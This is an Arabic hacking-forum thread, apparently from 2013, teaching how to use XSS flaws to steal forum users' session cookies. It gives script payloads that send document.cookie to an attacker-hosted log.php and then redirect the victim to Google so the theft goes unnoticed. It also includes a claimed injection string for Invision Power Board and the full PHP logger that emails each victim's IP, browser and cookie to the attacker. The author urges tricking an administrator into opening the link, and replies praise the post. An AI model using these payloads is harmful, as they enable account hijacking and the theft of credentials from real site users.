[عيد سعيد] شرح مبسط : استغلال ثغرات xss لاختراق الاجهزه [عيد سعيد]

zidanimeh · منذ /08-08-2013, 06:37 PM

لاختراق, مبسط, الاجهزه, استغلال, ثغرات, سعيد], [عيد

[عيد سعيد] شرح مبسط : استغلال ثغرات xss لاختراق الاجهزه [عيد سعيد]

السلام عليكم ورحمه الله وبركاته ,,

اهنيكم بمقدم العيد وأيامه

طيب نأتي الان الى الكود المهم في ثغرات xss

هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في ثغرات xss

كود PHP:


			
<Script>javascript:alert(document.******)</Script>

الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
1- رقم العضويه
2- الباسورد مشفر md5
3 - الباسورد مشفر Hash

ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!

طيب الحين وجدت هذا الكود سوف نربطه باللوج

ماهو اللوج ؟
اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج)

طيب الان بعد ما ربطته اصبح الرابط :

كود PHP:


			

[PHP]

<Script>location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>[/PHP]
تمام الان :
www.xxx.com = الموقع المربوط فيه اللوج
log.php = اسم ملف اللوج
طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
www.xxx.com/log.php برابط اللوج الي عندك

المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :

كود PHP:


			
<Script>javascript:alert(document.******)</Script>

بـ

كود PHP:


			
   <Script>location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>

الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابط

بتقول كيف بقولك ياااولد انت وراااااسك(6) عاد بطريقتك خليه يفتح الرابط

طيب الحين بتقولي والله فضيحه يابو خالد لم اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني

بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه

مثلا نربطه بموقع www.google.com بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل وبكذا مايشك

بتقول كيف يابو خالد بقولك كذا نضع بعد رابط اللوج :
re=www.google.com&
بس
بحيث يكون بعد & يوجد id ... الخ
يعني يكون الكود :

كود PHP:


			
   <Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>

طبعا انت استبدل www.google.com باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)

بعطيكم مثال لثغره الي اكتشفتها انا بمنتديات :Invision Power Board

الكود للثغره :
http://xxx.com/forums/index.php?act=idx='><script>alert(document.******)</script>

====================
تطبيق :

التطبيق هنا :

كود PHP:


			
http://www.example.com/forums/index.php?act=idx='><script>alert(document.******)</script>

===================
اللوج :

كود PHP:


			
   <?php 
// Thnx For Security 4 Arab - [url]http://www.s4a.cc[/url] - [url]http://www.s4a.com/forum[/url] 
//----- S4a Logger v0.10 -----// 
// Star 
//Your Email --::-- 
$ToGet = "Linux_Drox@hotmail.com"; 
//////////////////////////////// 
$Ip = $REMOTE_ADDR; 
$Sys = $HTTP_USER_AGENT; 
////////////////////////////////////////////// 
if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();} 
// 
$Time = date("l dS of F Y h:i:s A"); 
 
$Hdr = 'From: Logger <logger@secourty>'; 
 
$Msg = ' 

--------------------------------------------------------------------- 
- IP         ::- [ ' .$Ip.'  ] 
- System     ::- [  '.$Sys.' ] 
- The ****** ::- [  '.$id.'  ] 
- Time       ::- [ '.$Time.' ] 
--------------------------------------------------------------------- 
'; 
$send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr); 
// 
/* &@#&@#&@#&@#&@#&@#&@# code ,, By Devil-00 [  25/5/2005 ] << v0.10 */  
if(isset($_GET["re"])){ 
$&@#&@#&@#&@#&@#&@#&@# = $_GET["re"]; 
if($&@#&@#&@#&@#&@#&@#&@# == ""){ 
mail ($ToGet,'S4a - [Error]','&@#&@#&@#&@#&@#&@#&@# Is Set And Its Empty !!',$Hdr); 
}else{ 
header("location:".$&@#&@#&@#&@#&@#&@#&@#); 
} 
} 
// 
?>

استبدل هنا :

كود PHP:

padding: 8px; border: 1px inset; width: 640px; height: 34px; text-align: left; overflow: auto">


			
    $ToGet = "Linux_Drox@hotmail.com";

الايميل: Linux_Drox@hotmail.com
بالايميل تبعك !

واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير الايميل واحفظه بامتداد php
وارفعه على موقعك او على موقع لايكوس

وأخص بالشكر هنا لأخي العزيز Devil-00 لبرمجته هذا اللوج الأكثر من رائع صراحة

المصدر: development-point - للمزيد تابع : قسم إختراق الأجـهـزه والأيـمـيـلات

Fud] sud]D avp lfs' : hsjyghg eyvhj xss ghojvhr hgh[i.i

GENERAL AMERICA · منذ /08-08-2013, 06:45 PM

عيد سعيد حبيبي ينعاد علينة وعليكم بلصحة والعافية ي بطل مشكور ي وحش
موضوع
رائع

THEPIRATE · منذ /08-08-2013, 06:46 PM

موضوع جبار ومميز واصل يامبدع

Estudiante de hack · منذ /08-08-2013, 06:57 PM

يعطيك الف عافية

المواضيع المتشابهه للموضوع: [عيد سعيد] شرح مبسط : استغلال ثغرات xss لاختراق الاجهزه [عيد سعيد]
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
كيفية استغلال ثغرات من نوع sql بالباك تراك باحترافية :)	SnipeR	قسم توزيعات أختبار الأخترآق المتقدم	0	12-11-2012 07:18 PM
أزور قلبي .. وقلبي بالسلام : أحرى - سعيد بن مانع !	‏windows 8	الأرشيف	0	11-11-2012 03:25 PM
استغلال ثغرات اضافات موزيلا بأداة (cobaltsrike) خارج الشبكة حصري	‏windows 8	قسم توزيعات أختبار الأخترآق المتقدم	3	11-10-2012 05:24 AM

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)

[عيد سعيد] شرح مبسط : استغلال ثغرات xss لاختراق الاجهزه [عيد سعيد]

السلام عليكم ورحمه الله وبركاته ,, اهنيكم بمقدم العيد وأيامه طيب نأتي الان الى الكود المهم في xss هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في xss